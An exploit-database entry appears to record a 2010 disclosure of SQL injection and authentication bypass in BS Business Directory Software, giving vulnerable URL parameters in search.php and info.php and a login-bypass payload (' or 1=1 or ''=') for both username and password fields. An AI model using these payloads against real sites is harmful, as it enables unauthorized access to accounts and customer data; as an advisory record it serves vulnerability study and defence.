Bs Business_Directory Script Sqli Vulnerability

vendor:

BS Business Directory Software

by:

Sid3^effects aKa HaRi

9,3

CVSS

HIGH

SQL Injection

CWE

Product Name: BS Business Directory Software

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2010

Bs Business_Directory Script Sqli Vulnerability

BS Business Directory Software allows people to browse and search for businesses in their area. The listings are fully detailed with descriptions, ratings, features, photos, reviews, contact information and driving directions linked to MapQuest. Users can also open an account and save their favorite businesses to their online note book. Business people can also list their businesses. After the registration, they are able to select and buy a package depending on the length of time they would like their business to be listed. Payment can be made through PayPal or 2Checkout. The subscribers will be informed about their statistics via email - 10 days before the expiration of his account, 5 days, 1 day. 24 hours after his account expiration date, all his listings and his account will be deleted automatically. An attacker can exploit the SQL injection vulnerability by sending malicious SQL queries to the database via the vulnerable parameters in the URL. An attacker can also bypass authentication by using the username and password as 'or'1'='1.

Mitigation:

Input validation should be used to prevent SQL injection attacks. Authentication should be properly implemented to prevent bypass.

Source

Exploit-DB raw data:

1               ##########################################             1
0               I'm Sid3^effects member from Inj3ct0r Team             1
1               ##########################################             0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

Name :  Bs Business_Directory Script Sqli Vulnerability
Date : july 5,2010
Critical Level 	: HIGH
vendor URL :http://www.brotherscripts.com/
Price:$24.95
Author : Sid3^effects aKa HaRi <shell_c99[at]yahoo.com>
special thanks to : r0073r (inj3ct0r.com),L0rd CruSad3r,MaYur,MA1201,KeDar,Sonic,gunslinger_
greetz to :www.topsecure.net ,All ICW members and my friends :) luv y0 guyz 
#######################################################################################################
Description : 
BS Business Directory Software allows people to browse and search for businesses in their area. The listings are fully detailed with descriptions, ratings, features, photos, reviews, contact information and driving directions linked to MapQuest. Users can also open an account and save their favorite businesses to their online note book.
Business people can also list their businesses.After the registration , they are able to select and buy a package depending on the length of time they would like their business to be listed. Payment can be made through PayPal or 2Checkout. The subscribers will be informed about their statistics via email - 10 days before the expiration of his account, 5 days, 1 day. 24 hours after his account expiration date, all his listings and his account will be deleted automatically.

#######################################################################################################
Xploit :SQli Vulnerability

DEMO URL 1:http://server/Business_Directory/search.php?c=[sqli]

DEMO URL 2:http://server/Business_Directory/info.php?id=[sqli]

###############################################################################################################
Xploit : Auth Bypass 

Use  ' or 1=1 or ''='  in both username and password :) 

###############################################################################################################
# 0day no more 
# Sid3^effects